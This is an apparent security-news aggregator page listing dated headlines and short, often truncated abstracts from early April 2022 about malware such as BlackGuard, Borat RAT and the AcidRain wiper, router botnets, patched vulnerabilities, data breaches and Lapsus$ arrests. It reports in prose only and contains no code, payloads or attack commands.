Abstract A previously undocumented "sophisticated" information-stealing malware named BlackGuard is being advertised for sale on Russian underground forums for a monthly subscription of $200. "BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients," Zscaler ThreatLabz researchers Mitesh Wani and Kaivalya Khursale said in a report published last week. Also sold for a lifetime price of $700, BlackGuard is designed as a .NET-based malware that's actively under development, boasting of a number of anti-analysis, anti-debugging, and anti-evasion features that allow it to kill processes related to antivirus engines and bypass string-based detection. What's more, it checks the IP address of the infected devices by sending a request to the domain "https://ipwhois[.]app/xml/," and exits itself if the country is one among the Commonwealth of Indep

The Hacker News

April 4, 2022 – Malware

Borat RAT, a new RAT that performs ransomware and DDoS attacks Full Text

Abstract Cyble researchers discovered a new remote access trojan (RAT) named Borat capable of conducting DDoS and ransomware attacks. Researchers from threat intelligence firm Cyble discovered a new RAT, named Borat, that enables operators to gain full access...

Security Affairs

April 04, 2022 – Hacker

FIN7 hackers evolve toolset, work with multiple ransomware gangs Full Text

Abstract Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the actor is still very active, evolving, and trying new monetization methods.

BleepingComputer

April 4, 2022 – Phishing

“Free easter chocolate basket” is a social media scam after your personal details Full Text

Abstract Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook. The Dorset Police Cyber Crime Unit posted an appeal about this scam on its Facebook page.

Malwarebytes Labs

April 04, 2022 – Denial Of Service

Beastmode DDoS Botnet Exploiting New TOTOLINK Bugs to Enslave More Routers Full Text

Abstract A variant of the Mirai botnet called Beastmode has been observed adopting newly disclosed vulnerabilities in TOTOLINK routers between February and March 2022 to infect unpatched devices and expand its reach potentially. "The Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits," Fortinet's FortiGuard Labs Research team said. "Five new exploits were added within a month, with three targeting various models of TOTOLINK routers." The list of exploited vulnerabilities in TOTOLINK routers is as follows: CVE-2022-26210 (CVSS score: 9.8), a command injection vulnerability that could be exploited to gain arbitrary code execution; CVE-2022-26186 (CVSS score: 9.8), a command injection vulnerability affecting TOTOLINK N600R and A7100RU routers; and CVE-2022-25075 to CVE-2022-25084 (CVSS scores: 9.8), a command injection vulnerability impacting multiple TOTOLINK routers, leading to code execution. The other e

The Hacker News

April 4, 2022 – Vulnerabilities

Experts discovered 15-Year-Old vulnerabilities in the PEAR PHP repository Full Text

Abstract SonarSource discovered a 15-year-old flaw in the PEAR PHP repository that could have enabled supply chain attacks. Researchers from SonarSource discovered two 15-year-old security flaws in the PEAR (PHP Extension and Application Repository) repository...

Security Affairs

April 4, 2022 – Breach

Cyberattack on Iberdrola Compromises Data of Millions of Customers in Spain Full Text

Abstract Spain’s energy giant Iberdrola has revealed that it suffered a cyberattack on March 15 which has affected 1.3 million customers, although the company has reassured that the hackers were unable to access “sensitive” information such as bank details.

spanishnewstoday

April 4, 2022 – Breach

Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Full Text

Abstract After claiming to hack the private firms Thozis Corp and Marathon Group owned by oligarchs, the collective announced the hack of the Russian Orthodox Church’s charitable wing and leaked 15GB of data along with 57,000 emails.

Security Affairs

April 03, 2022 – Cryptocurrency

Fake Trezor data breach emails used to steal cryptocurrency wallets Full Text

Abstract A compromised Trezor hardware wallet mailing list was used to send fake data breach notifications to steal cryptocurrency wallets and the assets stored within them.

BleepingComputer

April 3, 2022 – Breach

Documents reveal financial fallout of Salt Lake City IT security breach Full Text

Abstract That document, obtained by the KSL Investigators through a public records request, states more than 150 databases and all public safety software systems were reviewed for potential compromises but, "none have been found."

KSL

April 3, 2022 – APT

China-linked APT Deep Panda employs new Fire Chili Windows rootkit Full Text

Abstract The China-linked hacking group Deep Panda is targeting VMware Horizon servers with the Log4Shell exploit to install a new Fire Chili rootkit. Researchers from Fortinet have observed the Chinese APT group Deep Panda using a Log4Shell exploit...

Security Affairs

April 03, 2022 – Malware

New Borat remote access malware is no laughing matter Full Text

Abstract A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment.

BleepingComputer

April 3, 2022 – General

Supply Chain Attacks Against Open-Source Software Soar Full Text

Abstract Towards the beginning of March, researchers from Sonatype identified hundreds of counterfeit packages in npm and PyPI repositories that were used to execute Remote Access Trojans (RATs).

Cyware Alerts - Hacker News

April 3, 2022 – Government

Mar 27 – Apr 02 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Apr 02 - Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Anonymous claims to have hacked...

Security Affairs

April 3, 2022 – General

Security Affairs newsletter Round 359 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 02, 2022 – Policy and Law

UK charges two teenagers linked to the Lapsus$ hacking group Full Text

Abstract Two teenagers from the UK charged with helping the Lapsus$ extortion gang have been released on bail after appearing in the Highbury Corner Magistrates Court on Friday morning.

BleepingComputer

April 2, 2022 – Ransomware

Hive Ransomware Evolves to Add Many New Features Full Text

Abstract Hive is a relatively new ransomware outfit that made its appearance in late June 2021. It gained notoriety through over 350 attacks on organizations across several sectors.

Cyware Alerts - Hacker News

April 02, 2022 – Outage

American Express down in outage: users report login and payment issues Full Text

Abstract Yesterday, American Express users across the world including US, UK, and Europe, experienced widespread outages lasting hours, and some users continue to. BleepingComputer was able to briefly reproduce issues right before Amex confirmed partially restoring services.

BleepingComputer

April 2, 2022 – Attack

Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text

Abstract Anonymous continues to target Russian firms owned by oligarchs. After announcing the hack of the Thozis Corp, the group claimed they had breached the systems of the Marathon Group and released 62,000 emails (a 52GB archive) through DDoSecrets.

Security Affairs

April 2, 2022 – Breach

Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Full Text

Abstract Anonymous claims to have hacked the Russian Orthodox Church's charitable wing and leaked 15 GB of alleged stolen data. Anonymous continues to target Russian government entities and private businesses, this week the group claimed to have hacked the private...

Security Affairs

April 2, 2022 – Phishing

Phishing attacks exploit free calendar app to steal account credentials Full Text

Abstract In a recent report, email security provider INKY described a recent phishing campaign that took advantage of the Calendly calendar app to harvest sensitive account credentials from unsuspecting victims.

Tech Republic

April 2, 2022 – Criminals

UK Police charges two teenagers for their alleged role in the Lapsus$ extortion group Full Text

Abstract The City of London Police charged two of the seven teenagers who were arrested for their alleged role in the LAPSUS$ data extortion gang. The duo has been released on bail after appearing in Highbury Corner Magistrates' Court on Friday. The...

Security Affairs

April 2, 2022 – Breach

Ola Finance Says Attackers Stole $4.7M in ‘Re-Entrancy’ Exploit Full Text

Abstract Decentralized lending platform Ola Finance was exploited for over $4.67 million in a “re-entrancy” cyberattack, according to a post-mortem report released by the developers.

Yahoo! Finance

April 2, 2022 – Botnet

Beastmode Mirai botnet now includes exploits for Totolink routers Full Text

Abstract Operators behind the Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) added exploits for Totolink routers. The Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) now includes exploits...

Security Affairs

April 2, 2022 – Ransomware

Scammers are Exploiting Ukraine Donations Full Text

Abstract Scammers are exploiting the current events in Ukraine, especially after the official Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations.

McAfee

April 2, 2022 – Breach

Ukraine intelligence leaks names of 620 alleged Russian FSB agents Full Text

Abstract The Ukrainian Defense Ministry’s Directorate of Intelligence leaked personal data belonging to 620 alleged Russian FSB agents. The Ukrainian Defense Ministry’s Directorate of Intelligence has leaked the alleged personal data of 620 Russian FSB officers....

Security Affairs

April 2, 2022 – Malware

WordPress Popunder Malware Redirects to Scam Sites Full Text

Abstract The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines in an attempt to stay hidden.

Security Boulevard

April 2, 2022 – Vulnerabilities

Critical CVE-2022-1162 flaw in GitLab allowed threat actors to take over accounts Full Text

Abstract GitLab has addressed a critical vulnerability, tracked as CVE-2022-1162 (CVSS score of 9.1), that could allow remote attackers to take over user accounts. The CVE-2022-1162 vulnerability is related to the set of hardcoded static passwords during...

Security Affairs

April 2, 2022 – Vulnerabilities

Trend Micro fixed high severity flaw in Apex Central product management console Full Text

Abstract Trend Micro has fixed a high severity arbitrary file upload flaw, tracked as CVE-2022-26871, in the Apex Central product management console. Cybersecurity firm Trend Micro has addressed a high severity security flaw, tracked as CVE-2022-26871, in the Apex...

Security Affairs

April 01, 2022 – Vulnerabilities

15-Year-Old Bug in PEAR PHP Repository Could’ve Enabled Supply Chain Attacks Full Text

Abstract A 15-year-old security vulnerability has been disclosed in the PEAR PHP repository that could permit an attacker to carry out a supply chain attack, including obtaining unauthorized access to publish rogue packages and execute arbitrary code. "An attacker exploiting the first one could take over any developer account and publish malicious releases, while the second bug would allow the attacker to gain persistent access to the central PEAR server," SonarSource vulnerability researcher Thomas Chauchefoin said in a write-up published this week. PEAR, short for PHP Extension and Application Repository, is a framework and distribution system for reusable PHP components. One of the issues, introduced in a code commit made in March 2007 when the feature was originally implemented, relates to the use of the cryptographically insecure mt_rand() PHP function in the password reset functionality that could allow an attacker to "discover a valid password reset token in les

The Hacker News

April 01, 2022 – Hacker

British Police Charge Two Teenagers Linked to LAPSUS$ Hacker Group Full Text

Abstract The City of London Police on Friday disclosed that it has charged two of the seven teenagers, a 16-year-old and a 17-year-old, who were arrested last week for their alleged connections to the LAPSUS$ data extortion gang. "Both teenagers have been charged with: three counts of unauthorized access to a computer with intent to impair the reliability of data; one count of fraud by false representation and one count of unauthorized access to a computer with intent to hinder access to data," Detective Inspector Michael O'Sullivan, from the City of London Police, said in a statement. In addition, the unnamed 16-year-old minor has been charged with one count of causing a computer to perform a function to secure unauthorized access to a program. The charges come as the City of London Police moved to arrest seven suspected LAPSUS$ gang members aged between 16 and 21 on March 25, with the agency telling The Hacker News that all the individuals had been subsequently "re

The Hacker News

April 01, 2022 – Vulnerabilities

GitLab Releases Patch for Critical Vulnerability That Could Let Attackers Hijack Accounts Full Text

Abstract DevOps platform GitLab has released software updates to address a critical security vulnerability that, if potentially exploited, could permit an adversary to seize control of accounts. Tracked as CVE-2022-1162, the issue has a CVSS score of 9.1 and is said to have been discovered internally by the GitLab team. "A hardcoded password was set for accounts registered using an OmniAuth provider (e.g., OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts," the company said in an advisory published on March 31. GitLab, which has addressed the bug with the latest release of versions 14.9.2, 14.8.5, and 14.7.7 for GitLab Community Edition (CE) and Enterprise Edition (EE), also said it took the step of resetting the password of an unspecified number of users out of an abundance of caution. "Our investigation shows no indication that users or accounts have

The Hacker News

April 01, 2022 – Malware

Newly found Android malware records audio, tracks your location Full Text

Abstract A previously unknown Android malware uses the same shared-hosting infrastructure previously seen used by the Russian APT group known as Turla, though attribution to the hacking group is not possible.

BleepingComputer

April 01, 2022 – Ransomware

The Week in Ransomware - April 1st 2022 - ‘I can fight with a keyboard’ Full Text

Abstract While ransomware is still conducting attacks and all companies must stay alert, ransomware news has been relatively slow this week. However, there were still some interesting stories that we outline below.

BleepingComputer

April 1, 2022 – Phishing

Phishing Attacks Target NATO and European Military Full Text

Abstract Google TAG found multiple cybercriminal activities, such as phishing and malware attacks, targeting NATO and Eastern European countries. An APT group adopted a novel Browser-in-the-Browser (BitB) phishing technique. A group with alleged links to China targeted government and military organizations ...

Cyware Alerts - Hacker News

April 01, 2022 – Attack

Russian Wiper Malware Likely Behind Recent Cyberattack on Viasat KA-SAT Modems Full Text

Abstract The cyberattack aimed at Viasat that temporarily knocked KA-SAT modems offline on February 24, 2022, the same day Russian military forces invaded Ukraine, is believed to have been the consequence of wiper malware, according to the latest research from SentinelOne. The findings come as the U.S. telecom company disclosed that it was the target of a "multifaceted and deliberate" cyberattack against its KA-SAT network, linking it to a "ground-based network intrusion by an attacker exploiting a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network." Upon gaining access, the adversary issued "destructive commands" on tens of thousands of modems belonging to the satellite broadband service that "overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable." But SentinelOne said it uncovered a new piece of malware (named &qu

The Hacker News

April 1, 2022 – Government

Congress Invests in National Cyber Resilience but Misses Important Opportunities in the Consolidated Appropriations Act Full Text

Abstract The new appropriations bill is sound overall, but it addresses only half of the federal government’s cybersecurity mandate.

Lawfare

April 1, 2022 – Attack

Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text

Abstract Anonymous continues its operations against Russia; the group announced the hack of the Russian investment firm Marathon Group. Anonymous continues to target Russian firms owned by oligarchs; yesterday the collective announced the hack of the Thozis...

Security Affairs

April 01, 2022 – Solution

Microsoft now lets you enable the Windows App Installer again, here’s how Full Text

Abstract Microsoft now allows enterprise admins to re-enable the MSIX ms-appinstaller protocol handler disabled after Emotet abused it to deliver malicious Windows App Installer packages.

BleepingComputer

April 1, 2022 – Malware

Verblecon: A New Advanced Malware Loader Full Text

Abstract A threat actor was spotted employing a sophisticated crypto-mining malware, dubbed Verblecon, on systems to steal access tokens for Discord chat app users. There are reports that connect a Verblecon domain to a ransomware attack as well. Organizations are recommended to use up-to-date and reli ...

Cyware Alerts - Hacker News

April 01, 2022 – Vulnerabilities

Critical Bugs in Rockwell PLC Could Allow Hackers to Implant Malicious Code Full Text

Abstract Two new security vulnerabilities have been disclosed in Rockwell Automation's programmable logic controllers (PLCs) and engineering workstation software that could be exploited by an attacker to inject malicious code on affected systems and stealthily modify automation processes. The flaws have the potential to disrupt industrial operations and cause physical damage to factories in a manner similar to that of Stuxnet and the Rogue7 attacks, operational technology security company Claroty said. "Programmable logic and predefined variables drive these [automation] processes, and changes to either will alter normal operation of the PLC and the process it manages," Claroty's Sharon Brizinov noted in a write-up published Thursday. The list of two flaws is below – CVE-2022-1161 (CVSS score: 10.0) – A remotely exploitable flaw that allows a malicious actor to write user-readable "textual" program code to a separate memory location from the executed c

The Hacker News

April 1, 2022 – Malware

AcidRain, a wiper that crippled routers and modems in Europe Full Text

Abstract Researchers spotted a new destructive wiper, tracked as AcidRain, that is likely linked to the recent attack against Viasat. Security researchers at SentinelLabs have spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers...

Security Affairs

April 01, 2022 – Privacy

Russian-linked Android malware records audio, tracks your location Full Text

Abstract A previously unknown Android malware has been linked to the Turla hacking group after discovering the app used infrastructure previously attributed to the threat actors.

BleepingComputer

April 1, 2022 – Ransomware

Hive Ransomware Ported to Rust, Encryptor Updated Full Text

Abstract Hive ransomware actors ported their Linux encryptor to the Rust programming language to target VMware ESXi servers. Additionally, they have added new features to make it difficult for security researchers to snoop on victims' ransom negotiations, which they appear to have copied from BlackCat. Organizatio ...

Cyware Alerts - Hacker News

April 01, 2022 – Attack

Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit Full Text

Abstract A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data. "The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates," said Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries." Deep Panda, also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building," according to Secureworks. Cybersecurity firm CrowdStrike, which assigned the panda

The Hacker News

April 1, 2022 – Vulnerabilities

Zyxel fixes a critical bug in its business firewall and VPN devices Full Text

Abstract Zyxel issued security updates for a critical vulnerability that affects some of its business firewall and VPN devices. Networking equipment vendor Zyxel has pushed security updates for a critical flaw, tracked as CVE-2022-0342 (CVSS 9.8), that affects...

Security Affairs

April 01, 2022 – Botnet

Beastmode botnet boosts DDoS power with new router exploits Full Text

Abstract A Mirai-based distributed denial-of-service (DDoS) botnet tracked as Beastmode (aka B3astmode) has updated its list of exploits to include several new ones, three of them targeting various models of Totolink routers.

BleepingComputer

April 1, 2022 – Vulnerabilities

GitLab addresses critical account hijack bug Full Text

Abstract GitLab has patched a critical vulnerability that meant static passwords were inadvertently set during OmniAuth-based registration – putting accounts at risk of malicious takeover.

The Daily Swig

April 01, 2022 – General

Results Overview: 2022 MITRE ATT&CK Evaluation – Wizard Spider and Sandworm Edition Full Text

Abstract Threat actor groups like Wizard Spider and Sandworm have been wreaking havoc over the past few years – developing and deploying cybercrime tools like Conti, Trickbot, and Ryuk ransomware. Most recently, Sandworm (suspected to be a Russian cyber-military unit) unleashed cyberattacks against Ukrainian infrastructure targets. To ensure cybersecurity providers are battle ready, MITRE Engenuity uses real-world attack scenarios and tactics implemented by threat groups to test security vendors' capabilities to protect against threats – the MITRE ATT&CK Evaluation. Each vendor's detections and capabilities are assessed within the context of the MITRE ATT&CK Framework. This year, they used the tactics seen in Wizard Spider's and Sandworm's attacks during their evaluation simulations. And MITRE Engenuity didn't go easy on these participating vendors. As mentioned before – the stakes are too high, and risk is growing. The 2022 results overview To think about it simply, this MITRE ATT&CK Ev

The Hacker News

April 1, 2022 – Government

CISA adds Sophos firewall bug to Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical Sophos firewall flaw and seven other issues to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA)...

Security Affairs

April 01, 2022 – Vulnerabilities

Trend Micro fixes actively exploited remote code execution bug Full Text

Abstract Japanese cybersecurity software firm Trend Micro has patched a high severity security flaw in the Apex Central product management console that can let attackers execute arbitrary code remotely.

BleepingComputer

April 1, 2022 – Vulnerabilities

Trend Micro Patches Apex Central Zero-Day Exploited in Targeted Attacks Full Text

Abstract Trend Micro this week announced patches for a high-severity arbitrary file upload vulnerability in Apex Central that has already been exploited in what appear to be targeted attacks.

Security Week

April 01, 2022 – Hacker

North Korean Hackers Distributing Trojanized DeFi Wallet Apps to Steal Victims’ Crypto Full Text

Abstract The North Korean state-backed hacking crew, otherwise known as the Lazarus Group, has been attributed to yet another financially motivated campaign that leverages a trojanized decentralized finance (DeFi) wallet app to distribute a fully-featured backdoor onto compromised Windows systems. The app, which is equipped with functionalities to save and manage a cryptocurrency wallet, is also designed to trigger the launch of the implant that can take control of the infected host. Russian cybersecurity firm Kaspersky said it first encountered the rogue application in mid-December 2021. The infection scheme initiated by the app also results in the deployment of the installer for a legitimate application, which gets overwritten with a trojanized version in an effort to cover its tracks. That said, the initial access avenue is unclear, although it's suspected to be a case of social engineering. The spawned malware, which masquerades as Google's Chrome web browser, subsequently

The Hacker News

April 1, 2022 – Vulnerabilities

Flaws in Wyze cam devices allow their complete takeover Full Text

Abstract Wyze Cam devices are affected by three security vulnerabilities that can allow attackers to take them over and access camera feeds. Bitdefender researchers discovered three security vulnerabilities in the popular Wyze Cam devices that can be exploited...

Security Affairs

April 01, 2022 – Vulnerabilities

Critical GitLab vulnerability lets attackers take over accounts Full Text

Abstract GitLab has addressed a critical severity vulnerability that could allow remote attackers to take over user accounts using hardcoded passwords.

BleepingComputer

April 1, 2022 – Insider Threat

NSA employee indicted for ‘leaking top secret defense info’ Full Text

Abstract The United States Department of Justice (DoJ) has accused an NSA employee of sharing top-secret national security information with an unnamed person who worked in the private sector.

The Register

April 01, 2022 – Breach

Sitel on Okta breach: “spreadsheet” did not contain passwords Full Text

Abstract Okta's outsourced provider of support services, Sitel (Sykes), has shared more information this week in response to the leaked documents that detailed the various incident response tasks carried out by Sitel after the Lapsus$ hack.

BleepingComputer

April 1, 2022 – Outage

Modem-wiping malware caused Viasat broadband outage Full Text

Abstract Tens of thousands of Viasat satellite broadband modems that were disabled in a cyber-attack some weeks ago were wiped by malware with possible links to Russia's destructive VPNFilter, according to SentinelOne.

The Register
